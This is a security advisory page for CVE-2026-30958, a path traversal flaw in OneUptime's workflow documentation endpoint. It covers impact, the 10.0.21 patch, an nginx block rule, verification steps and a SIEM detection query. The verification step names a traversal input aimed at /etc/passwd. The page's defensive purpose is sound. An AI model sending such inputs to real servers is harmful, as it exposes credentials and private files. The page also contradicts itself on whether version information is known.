CVE-2026-30958
📋 TL;DR
CVE-2026-30958 is an unauthenticated path traversal vulnerability in OneUptime's workflow documentation endpoint that allows attackers to read arbitrary files from the server filesystem. All OneUptime instances running versions before 10.0.21 are affected. The vulnerability occurs because user input is directly concatenated into file paths without proper sanitization.
💻 Affected Systems
- OneUptime
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise through reading sensitive files like configuration files, SSH keys, database credentials, or source code, potentially leading to further attacks.
Likely Case
Unauthorized access to sensitive server files containing configuration data, credentials, or application secrets.
If Mitigated
Limited impact if proper network segmentation and file permissions restrict access to sensitive files.
🎯 Exploit Status
The vulnerability requires no authentication and uses simple path traversal techniques.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.0.21
Vendor Advisory: https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff
Restart Required: Yes
Instructions:
1. Backup your OneUptime instance. 2. Update to version 10.0.21 or later using your deployment method (Docker, Kubernetes, etc.). 3. Restart the application. 4. Verify the update was successful.
🔧 Temporary Workarounds
Block vulnerable endpoint
allUse web application firewall or reverse proxy to block access to /workflow/docs/* endpoint
# Example nginx location block
location ~ ^/workflow/docs/ { deny all; }
Disable workflow feature
allDisable the workflow component if not required
# Set environment variable or configuration to disable workflow feature
🧯 If You Can't Patch
- Implement strict network access controls to limit who can access the OneUptime instance
- Apply strict file system permissions to limit what files the application user can read
🔍 How to Verify
Check if Vulnerable:
Check if your OneUptime version is below 10.0.21 and test if /workflow/docs/ endpoint accepts path traversal sequences like ../../../etc/passwdCheck Version:
Check OneUptime dashboard or application logs for version informationVerify Fix Applied:
After updating to 10.0.21+, test that path traversal attempts to the /workflow/docs/ endpoint are properly rejected📡 Detection & Monitoring
Log Indicators:
- Multiple failed requests to /workflow/docs/ with path traversal patterns
- Unusual file access patterns from the application
Network Indicators:
- HTTP requests containing ../ sequences in the URL path
- Requests to /workflow/docs/ endpoint from unexpected sources
SIEM Query:
source="web_access_logs" AND (url_path="/workflow/docs/*" AND (url_path="*../*" OR url_path="*..\\*"))